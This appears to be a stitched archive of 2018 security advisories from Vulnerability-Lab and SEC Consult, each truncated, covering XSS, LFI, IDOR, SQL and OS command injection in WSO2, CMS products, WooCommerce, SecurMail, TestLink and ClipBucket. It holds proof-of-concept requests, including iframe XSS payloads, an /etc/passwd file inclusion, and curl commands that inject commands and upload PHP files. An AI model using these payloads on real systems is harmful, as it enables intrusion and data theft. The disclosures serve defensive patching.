would be able to inject payloads from the front-end application into a middleware application, which is not accessible from the internet and attack administrators. 2) Stored Cross-Site Scripting in WSO2 Carbon The carbon UI offers a feature to add multiple BPS-Worker Hosts. In the worker host URL an arbitrary JavaScript payload can be injected and permanently stored in the web application. Proof of concept: - 1) Stored Cross-Site Scripting in WS02 Dashboard The following input fields are vulnerable and JavaScript payloads can be directly injected: - Firstname - Lastname - Username - Address It is suspected, that all user inputs are returned unfiltered in all server responses. 2) Stored Cross-Site Scripting in WSO2 Carbon To demonstrate the vulnerability, it is sufficient to add a new BPS worker and set the URL to the following payload: "> Everytime the carbon middleware application is accessed, the payload is triggered. Vulnerable / tested versions: - The following version has been tested which was the most recent version at the time of discovery: * WSO2IS 5.3.0 Vendor contact timeline: 2018-01-25: Contacting vendor through secur...@wso2.com 2018-02-08: Asking for status update. Vendor responds, that they are still investigating the issue. 2018-02-21: Vendor responds with release date and further details concerning the nature of the vulnerabilities. The XSS in the Carbon component was a duplicate and should be already fixed. Concerning the XSS in the dashboard a fix is implemented and will be rolled out with the release of WSO2 Identity Server 5.5.0. 2018-03-14: Requesting CVE from Mitre for the stored XSS in the Dashboard. 2018-03-15: Mitre assigned CVE-2018-8716. 2018-03-26: Vendor informed us, that the final release of the updated software will be o
Microsoft Skype Mobile v81.2 & v8.13 - Remote Denial of Service Vulnerability
inside by a resize of the image (view demo vide) 8. Now the message with the smilies must be quoted or copied and then transfered to any other skype input field were smilies are supported 9. Pasting around 50 of them results in an unexpected memory errors and uncaught exceptions or access violations Note: Tested for Android Samsung and Apple iOS. The resize of the larger image results in a memory corruption 10. Successful reproduce of the vulnerability! PoC Video: Shows the local issue and the remote triggered bug ... https://www.youtube.com/watch?v=2vcdQb98zE0 Solution - Fix & Patch: === Secure memory allocation when resizing emoticons images during rendering in transfers through the skype mobile software client. Microsoft resolved the vulnerability and prepared an updated version v8.17 & v8.18. In both versions the security issue is known as patched. Security Risk: == The security risk of the vulnerability in the skype mobile software client for ios and android is estimated as medium (cvss 4.7). Credits & Authors: == Benjamin Kunz Mejri [resea...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Section:magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php- vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
Sandoba CP:Shop CMS v2016.1 - Multiple Cross Site Scripting Vulnerabilities
ssed=yes] Connection[keep-alive] Response Header: server[Apache/2.4.27] x-powered-by[PHP/7.0.20] expires[Thu, 19 Nov 1981 08:52:00 GMT] cache-control[no-store, no-cache, must-revalidate] pragma[no-cache] x-frame-options[SAMEORIGIN] content-encoding[gzip] set-cookie[language=de; expires=Tue, 20-Feb-2018 13:00:40 GMT; Max-Age=259200; path=/] content-type[text/html; charset=utf-8] X-Firefox-Spdy[h2] - Status: 302[Found] GET https://cpshop.localhost:8080/evil.source Mime Type[text/html] Request Header: Host[cpshop.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate, br] Referer[https://cpshop.localhost:8080admin.php] Cookie[shop_userkey=afb404c7622db6ced7a120e8e4e24505; log_data=DEMOADMINSHOP; PHPSESSID=03f32863066e90b45f109d7b1d5a0b5e; language=de; cookieconsent_dismissed=yes] Connection[keep-alive] Upgrade-Insecure-Requests[1] Response Header: server[Apache/2.4.27] location[http://cpshop.localhost:8080] content-length[296] content-type[text/html; charset=iso-8859-1] X-Firefox-Spdy[h2] - Status: pending[] GET http://cpshop.localhost:8080/cpshop/admin.php?file=news=yes=yes%5Bsearch%5D= http%3A%2F%2Fcpshop.localhost:8080%2Fcpshop%2Fadmin.php%3Fform%255Bsearch%255D%3D%2522%253E%253Ciframe%2Bsrc%253Devil.source%2B onl%5Bvar%5D=1%5Bposter%5D=0%5Bcategory%5D=0=news Mime Type[unknown] Request Header: Host[cpshop.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0] Accept[*/*] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] X-Requested-With[XMLHttpRequest] Referer[http://cpshop.localhost:8080/cpshop/admin.php] Cookie[log_data=DEMOADMINCMS; PHPSESSID=aa820d024a8b72f3a57e12e72cc63bb6; language=de] DNT[1] - 14:06:37.847[179ms][total 538ms] Status: 200[OK] GET http://cpshop.localhost:8080/cpshop/admin.php?form%5Bsearch%5D=http%3A%2F%2Fcpshop.localhost:8080%2Fcpshop%2Fadmin.php%3Fform%255Bsearch%255D%3D%2522%253E%253Ciframe%2Bsrc%253Devil.source%2Bonl%5Bvar%5D=1%5Bposter%5D=0%5Bcategory%5D=0=news Mime Type[text/html] Request Header: Host[cpshop.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://cpshop.localhost:8080/cpshop/admin.php] Cookie[log_data=DEMOADMINCMS; PHPSESSID=aa820d024a8b72f3a57e12e72cc63bb6; language=de] Connection[keep-alive] Upgrade-Insecure-Requests[1] Response Header: Server[Apache/2.4.27] X-Powered-By[PHP/7.0.20] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate] Pragma[no-cache] X-Frame-Options[SAMEORIGIN] Content-Encoding[gzip] Set-Cookie[language=de; expires=Tue, 20-Feb-2018 13:06:37 GMT; Max-Age=259200; path=/] Upgrade[h2c] Connection[Upgrade, Keep-Alive] Keep-Alive[timeout=5, max=100] Transfer-Encoding[chunked] Content-Type[text/html; charset=utf-8] Reference(s): http://cpshop.localhost:8080/cpshop/admin.php?form%5Bsearch%5D= http://cpshop.localhost:8080/cpshop/admin.php#!file=help=search= https://cpshop.localhost:8080/cpshop/admin.php#!file=files=rename_dir[dir]=fancybox[path]= http://cpshop.localhost:8080/cpshop/admin.php?form[search]=https://www.test.de#!file=files=rename_dir[dir]= https://cpshop.localhost:8080/cpshop/admin.php#!file=files=rename_dir[dir]= Solution - Fix & Patch: === The cross site vulnerabilities can be resolved by implementation of htmlentities and a secure input restriction of characters. Security Risk: == The security risk of the client-side cross site scripting web vulnerabilities in the web-application are estimated as medium (cvss 3.4). Credits & Authors: ====== Vulnerability-Lab [resea...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibi
Weblication CMS Core & Grid v12.6.24 - Multiple Cross Site Scripting Vulnerabilities
g-img-src-x-img-] title[%22%3E%3Ciframe+src%3D%22evil.source%22+onload%3Dalert%28document.domain%29%3E%2520% 22%3E%3Ciframe+src%3D%22evil.source%22+onload%3Dalert%28document.cookie%29%3E] pathProjectGlobal[%2Fdefault-wGlobal] pathProjectLayout[] language[br] projectConnect[%2Fimg-src-x-img-img-src-x-img-] hostOnly[] pageOffline[%2Fimg-src-x-img-img-src-x-img-%2FwGlobal%2Fcontent%2Ferrordocs%2Foffline.php] permissionDenied[%2Fimg-src-x-img-img-src-x-img-%2FwGlobal%2Fcontent%2Ferrordocs%2Fpermission-denied.php] W_PRETMP_groups%5B%5D[%5BW_ID%5D] backupGroup[] Response Header: Server[Apache/2.4.27] X-Powered-By[PHP/7.0.20] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate] Vary[Accept-Encoding] Keep-Alive[timeout=5, max=100] Connection[Keep-Alive] Transfer-Encoding[chunked] Content-Type[text/html; charset=UTF-8] - Status: 200[OK] GET https://grid.localhost:8080/weblication/grid5/scripts/wFilemanager.php?action=showMaskEditOptionsProject=/img-src-x-img-img-src-x-img- Mime Type[text/html] Request Header: Host[grid.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Referer[https://grid.localhost:8080/weblication/grid5/apps/wEditorWd8/index.php?action=showfileedit=/default-wGlobal/ wGlobal/content/variables/default.wVariables.php=be=/de/index.php=default==0] Cookie[WSESSIONID=2a3af57351f0a4ea3cbdd39ac5763954; wCc=1; lastCheckUpdate=1518869664242; lastVersion=012.006.024.000] Connection[keep-alive] Upgrade-Insecure-Requests[1] Response Header: Server[Apache/2.4.27] X-Powered-By[PHP/7.0.20] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate] Pragma[no-cache] Content-Encoding[gzip] Vary[Accept-Encoding] Keep-Alive[timeout=5, max=97] Connection[Keep-Alive] Transfer-Encoding[chunked] Content-Type[text/html; charset=UTF-8] - Status: 200[OK] GET https://grid.localhost:8080/weblication/grid5/scripts/wEventmanager.php?action=showEvents=/img-src-x-img-img-src-x-img-=project=embed Mime Type[text/html] Request Header: Host[grid.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Referer[https://grid.localhost:8080/weblication/grid5/scripts/wFilemanager.php?action=showMaskEditOptionsProject=/img-src-x-img-img-src-x-img-] Cookie[WSESSIONID=2a3af57351f0a4ea3cbdd39ac5763954; wCc=1; lastCheckUpdate=1518869664242; lastVersion=012.006.024.000] Connection[keep-alive] Upgrade-Insecure-Requests[1] Response Header: Server[Apache/2.4.27] X-Powered-By[PHP/7.0.20] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-store, no-cache, must-revalidate] Pragma[no-cache] Keep-Alive[timeout=5, max=96] Connection[Keep-Alive] Transfer-Encoding[chunked] Content-Type[text/html; charset=UTF-8] Reference(s): https://grid.localhost:8080/ https://grid.localhost:8080/weblication/ https://grid.localhost:8080/weblication/grid5/ https://grid.localhost:8080/weblication/grid5/scripts/ https://grid.localhost:8080/weblication/grid5/scripts/wFilemanager.php Solution - Fix & Patch: === The vulnerability can be resolved by a sanitize of the delivered input through the wFilemanager.php file. Parse in the output location the execution point in the Inhaltsprojekte to resolve the issue. Security Risk: == The security risk of the persistent cross site scripting vulnerability in the web-application is estimated as medium (cvss 3.5). Credits & Authors: == Benjamin K.M. [resea...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with st
AEF CMS v1.0.9 - (PM) Persistent Cross Site Scripting Vulnerability
FCookies1526[aefsid]=jmik0sqtslneqffjl537i931brqh3tzr; AEFCookies8381[aefsid]=x1m0rs9lhcl6hl3tbq7qbdh9jn0xsnsf] Connection[keep-alive] Upgrade-Insecure-Requests[1] POST-Daten: pmrecipients[admin] pmsubject[test] pmbody[This+is+a+private+test+message+with+payload+in+the+ftp+link%0D%0A%0D%0A] postcode[yerudyyk4joz8ea5] pmsaveinsentitems[on] sendpm[Send+PM] Response Header: Server[Apache] X-Powered-By[PHP/5.4.45] Content-Length[217] Content-Type[text/html; charset=ISO-8859-1] - Status: 200[OK] GET https://aeforums.localhost:8000/AEF/evil.source Mime Type[text/html] Request Header: Host[aeforums.localhost:8000] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Referer[https://aeforums.localhost:8000/AEF/index.php?act=usercp=sendsaved=1] Cookie[AEFCookies1526[aefsid]=jmik0sqtslneqffjl537i931brqh3tzr; AEFCookies8381[aefsid]=x1m0rs9lhcl6hl3tbq7qbdh9jn0xsnsf] Connection[keep-alive] Upgrade-Insecure-Requests[1] Response Header: Server[Apache] Accept-Ranges[bytes] Content-Length[431] Content-Type[text/html; charset=UTF-8] Reference(s): https://aeforums.localhost:8000/AEF/ https://aeforums.localhost:8000/AEF/index.php Solution - Fix & Patch: === The security vulnerability can be patched by a sanitize of the ftp link element input field in the private message module. Parse in the editor the output location for the link to prevent the execution point of the issue. Security Risk: == The security risk of the persistent cross site scripting web vulnerability in the open-source web-application is estimated as medium (cvss 4.4). Credits & Authors: == Benjamin K.M. [resea...@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains:www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php- vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php- vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
SEC Consult SA-20180314-0 :: Arbitrary Shortcode Execution & Local File Inclusion in WooCommerce Products Filter (PluginUs.Net)
SEC Consult Vulnerability Lab Security Advisory < 20180314-0 > === title: Arbitrary Shortcode Execution & Local File Inclusion product: WOOF - WooCommerce Products Filter (PluginUs.Net) vulnerable version: 1.1.9 fixed version: 2.2.0 CVE number: (requested but not yet received) impact: Critical homepage: https://pluginus.net/ found: 2018-02-20 by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "PluginUs.Net is a little team of talented professionals from Ukraine. Unlike most of the big companies on the net, we believe in individual approach to every our customer. Web development is our passion and we always try to go an extra mile over our clients' expectations. Our team specializes in development of WordPress plugins. It's always exciting to try new technologies and approaches to get the project done and impress clients by realization of their ideas!" Source: https://pluginus.net/about-us/ Business recommendation: SEC Consult recommends to ugprade to the latest version available as soon as possible. Further detailed security tests should be performed in order to identify potential other security issues. Vulnerability overview/description: --- 1. Arbitrary Shortcode Execution The plugin implemented a page redraw AJAX function accessible to anyone without any authentication. WordPress shortcode markup in the "shortcode" parameters would be evaluated. Normally unauthenticated users can't evaluate shortcodes as they are often sensitive. Additionally, it is noted that there are other implemented shortcodes that are being used in this plugin which can be abused through the same attack. Worst, some of them could lead to remote code execution. 2. Local File Inclusion The vulnerability is due to the lack of args/input validation on render_html before allowing it to be called by extract(), a PHP built-in function. Because of this, the supplied args/input can be used to overwrite the $pagepath variable which then could lead to local file inclusion attack. Proof of concept: - 1. Arbitrary Shortcode Execution The parameter "shortcode" within the "admin-ajax.php" script is affected by the code execution vulnerability: POST /wp-admin/admin-ajax.php HTTP/1.1 [...] action=woof_redraw_woof=<> 2. Local File Inclusion The parameter "shortcode" within the "admin-ajax.php" script is affected by the local file inclusion vulnerability: POST /wp-admin/admin-ajax.php HTTP/1.1 [...] action=woof_redraw_woof=woof_search_options pagepath=/etc/passwd Vulnerable / tested versions: - PluginUs.Net WooCommerce Products Filter version 1.1.9 has been tested and found to be vulnerable. Vendor contact timeline: 2018-02-20: Contacting vendor through realmag...@gmail.com 2018-02-20: Vendor agreed to proceed without encrypted channel 2018-02-21: Sent security advisory to vendor 2018-02-26: Vendor sent patch containing the fixes 2018-02-26: Informed vendor the patch doesn't fully mitigate the vulnerability 2018-03-12: Request update from vendor 2018-03-12: Vendor said they already published the patch 2018-03-14: Public release of security advisory Solution: - The vendor provides an updated version and users are urged to upgrade to version 2.2.0 immediately: https://www.woocommerce-filter.com/update-woocommerce-products-filter-v-2-2-0/ Workaround: --- None Advisory URL: - https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/ind
SEC Consult SA-20180312-0 :: Multiple Critical Vulnerabilities in SecurEnvoy SecurMail
SEC Consult Vulnerability Lab Security Advisory < 20180312-0 > === title: Multiple Critical Vulnerabilities product: SecurEnvoy SecurMail vulnerable version: 9.1.501 fixed version: 9.2.501 or hotfix patch "1_012018" CVE number: CVE-2018-7701, CVE-2018-7702, CVE-2018-7703, CVE-2018-7704, CVE-2018-7705, CVE-2018-7706, CVE-2018-7707 impact: Critical homepage: https://www.securenvoy.com/ found: 2017-11 by: W. Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Sending and receiving encrypted emails is not an easy or simple experience. Businesses rely on email with an increasing amount of sensitive data sent across their networks. A revolutionary approach that doesn't suffer from the overheads of deployment and encryption management; just rock-solid security to give you 100% confidence in your business communications." URL: https://www.securenvoy.com/products/securmail/key-features.shtm Business recommendation: During a brief crash test of the SecurEnvoy SecurMail application several severe vulnerabilities have been identified that break the core security promises of the product. These vulnerabilities open the possibility for several different attack scenarios that allow an attacker to read other users' encrypted e-mails and overwrite or delete e-mails stored in other users' inboxes. As we have identified several critical vulnerabilities within a very short time frame we expect numerous other vulnerabilities to be present. As other SecureEnvoy products (besides the analyzed SecurMail) appear to be highly integrated (all products are installed with a single setup file) we suspect other components to also suffer from severe security deficits. We recommend not to use SecurEnvoy products (especially SecurMail) in a production environment until: * a comprehensive security audit has been performed and * state of the art security mechanisms have been adopted. Vulnerability overview/description: --- 1) Cross Site Scripting (CVE-2018-7703, CVE-2018-7707) SEC Consult did not find any functionality that encodes user input when creating HTML pages. Therefore persistent and reflected cross site scripting attacks are possible throughout the application. Some pages fail to properly decode URL encoded parameters. Because of this, cross site scripting cannot be exploited on these pages in most browsers. 2) Path Traversal (CVE-2018-7705, CVE-2018-7706) SEC Consult did not find any path traversal checks throughout the application. Since the application uses encrypted files as the primary method of data storage, this vulnerability can be exploited at several points. Using this vulnerability, a legitimate recipient can read mails sent to other recipients in plain text! 3) Insecure Direct Object Reference (CVE-2018-7704) Authorization checks are only partially implemented. This allows a legitimate recipient to read mails sent to other users in plain text. 4) Missing Authentication and Authorization (CVE-2018-7702) In order to send encrypted e-mails a client does not need to authenticate on the SecurEnvoy server. Therefore anyone with network access to the server can arbitrarily send e-mails that appear to come from an arbitrary sender address. Moreover, an attacker with network access to the server can re-send previous communication to arbitrary recipients. This allows him/her to extract all e-mails stored on the server. An attacker could also modify arbitrary messages stored on the server. 5) Cross Site Request Forgery (CVE-2018-7701) SEC Consult did not find any protection against cross site request forgery. An attacker could use this vulnerability to delete a victim's e-mail or to impersonate the victim and reply to his/her e-mails. Since these vulnerabilities were found during a very short time frame, SEC Consult believes that the product may contain a large number of other security vulnerabilities. As already several core security promises have been broken during this short crash test, no further tests were conducted. Proof of concept: - 1) Cross Site Scripting a) The following HTML fragments demonstrates reflected cross site scripting (CVE-2018-7703): --- snip --- --- snip --- b) E-mails that are sent using the HTML format can contain any
SEC Consult SA-20180228-0 :: Insecure Direct Object Reference vulnerability in TestLink Open Source Test Management
SEC Consult Vulnerability Lab Security Advisory < 20180228-0 > === title: Insecure Direct Object Reference product: TestLink Open Source Test Management vulnerable version: <1.9.17 fixed version: 1.9.17 (after November 2017), and the current "testlink_1_9" branch CVE number: - impact: Medium homepage: http://testlink.org/ found: 2017-09-22 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal Moscow - Munich - Kuala Lumpur - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "TestLink is a web based test management and test execution system. It enables quality assurance teams to create and manage their test cases as well as to organize them into test plans. These test plans allow team members to execute test cases and track test results dynamically." Source: https://github.com/TestLinkOpenSourceTRMS/testlink-code Business recommendation: SEC Consult advises to immediately install the available updates as attackers might gain access to sensitive data belonging to other users. A thorough security review performed by security professionals is highly recommended in order to identify potential further security deficiencies. Vulnerability overview/description: --- 1) Insecure Direct Object Reference An unauthenticated user can gain access to referenced files which are produced by different test cases. By using a simple ID iterator, all produced output data can be gathered from the whole system. The actual impact strongly depends on the classification of the produced data which is referenced. Therefore, the risk can vary from low to critical depending on the use case. Proof of concept: - 1) Insecure Direct Object Reference An unauthenticated attacker can download data from the TestLink environment by using the following url: http:///lib/attachments/attachmentdownload.php?skipCheck=1= The tag specifies the target address and can also include a sub- folder where the hosted TestLink application is located. Vulnerable / tested versions: - The following versions have been tested and are vulnerable. It is assumed that older versions are affected as well, e.g.: * 1.9.16 * 1.9.15 * 1.9.14 Vendor contact timeline: 2017-10-18: Contacting vendor through http://mantis.testlink.org Vendor requested the information. 2017-10-19: Asked if the advisory should be uploaded to mantis directly. 2017-10-21: Contact agreed. 2017-10-23: Uploaded the advisory to mantis. 2017-11-01: Contact provided a fix for 1.9.16. Fixes will be created for 1.9.15 and 1.9.14 too. Vendor asked us for verification. 2017-11-07: Stated that verification is not possible at the moment (no test instance) and that it can be verified easily with the PoC 2018-01-09: Asked for status update; No answer. 2018-01-29: Asked for status update; No answer. 2018-02-16: Asked for status update. 2018-02-17: Vendor responded that we can re-check the fix or release the advisory. 2018-02-19: Asked the vendor for reachable test-instance, reply: there is no test instance 2018-02-28: Public release of security advisory Solution: - Check-out the current testlink-code on branch "testlink_1_9": https://github.com/TestLinkOpenSourceTRMS/testlink-code/tree/testlink_1_9/ The following commit contains the fix since 2017-11-01: https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/d5ffdb7634e43ba352e9567333682b6436cfb43d Upgrade to 1.9.17 (after November 2017). Workaround: --- Restrict network access and do not expose the TestLink interface to the internet. Advisory URL: ----- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal Moscow - Munich - Kuala Lumpur - Singapore Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Henc
SEC Consult SA-20180227-0 :: OS command injection, arbitrary file upload & SQL injection in ClipBucket
SEC Consult Vulnerability Lab Security Advisory < 20180227-0 > === title: OS command injection, arbitrary file upload & SQL injection product: ClipBucket vulnerable version: <4.0.0 - Release 4902 fixed version: 4.0.0 - Release 4902 CVE number: - impact: critical homepage: http://clipbucket.com/ found: 2017-09-06 by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur) Wan Ikram (Office Kuala Lumpur) Fikri Fadzil (Office Kuala Lumpur) Jasveer Singh (Office Kuala Lumpur) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal Moscow - Munich - Kuala Lumpur - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "ClipBucket is a free and open source software which helps us to create a complete video sharing website like YouTube, Dailymotion, Metacafe, Veoh, Hulu in few minutes of setup. It was first created in 2007 by Arslan Hassan and his team of developers. ClipBucket was developed as a YouTube clone but has been upgraded with advanced features and enhancements. It uses FFMPEG for video conversion and thumbs generation which is the most widely used application so, users can stream it straight away using the Video JS and HTML 5 Players." Source: https://clipbucket.com/about Business recommendation: By exploiting the vulnerabilities documented in this advisory, an attacker can fully compromise the web server which has ClipBucket installed. Potentially sensitive data might get exposed through this attack. Users are advised to immediately install the patched version provided by the vendor. Vulnerability overview/description: --- 1. Unauthenticated OS Command Injection Any OS commands can be injected by an unauthenticated attacker. This is a serious vulnerability as the chances for the system to be fully compromised is very high. This same vulnerability can also be exploited by authenticated attackers with normal user privileges. 2. Unauthenticated Arbitrary File Upload A malicious file can be uploaded into the webserver by an unauthenticated attacker. It is possible for an attacker to upload a script to issue operating system commands. This same vulnerability can also be exploited by an authenticated attacker with normal user privileges. 3. Unauthenticated Blind SQL Injection The identified SQL injection vulnerabilities enable an attacker to execute arbitrary SQL commands on the underlying MySQL server. Proof of concept: - 1. Unauthenticated OS Command Injection Without having to authenticate, an attacker can exploit this vulnerability by manipulating the "file_name" parameter during the file upload in the script /api/file_uploader.php: $ curl -F "Filedata=@pfile.jpg" -F "file_name=aa.php ||<>" http://$HOST/api/file_uploader.php Alternatively, this vulnerability can also be exploited by authenticated basic privileged users with the following payload by exploiting the same issue in /actions/file_downloader.php: $ curl --cookie "[--SNIP--]" --data "file=http://localhost/vid.mp4_name=abc || <>" "http://$HOST/actions/file_downloader.php; 2. Unauthenticated Arbitrary File Upload Below is the cURL request to upload arbitrary files to the webserver with no authentication required. $ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php" "http://$HOST/actions/beats_uploader.php; $ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php" "http://$HOST/actions/photo_uploader.php; Furthermore, this vulnerability is also available to authenticated users with basic privileges: $ curl --cookie "[--SNIP--]" -F "coverPhoto=@valid-image-with-appended-phpcode.php" "http://$HOST/edit_account.php?mode=avatar_bg; 3. Unauthenticated Blind SQL Injection The following parameters have been identified to be vulnerable against unauthenticated blind SQL injection. URL : http://$HOST/actions/vote_channel.php METHOD : POST PAYLOAD : channelId=channelId=1-BENCHMARK(1, rand()) The source code excerpt below shows the vulnerable code VULN. FILE : /actions/vote_channel.php VULN. CODE : [...] $vote = $_POST["vote"]; $userid = $_POST["channelId"]; //if($userquery->login_check('',true)){ if($vote == "yes"){ $query = "UPDATE " . tbl("users") . " SET
SEC Consult SA-20180221-0 :: Hijacking of arbitrary miSafes Mi-Cam video baby monitors
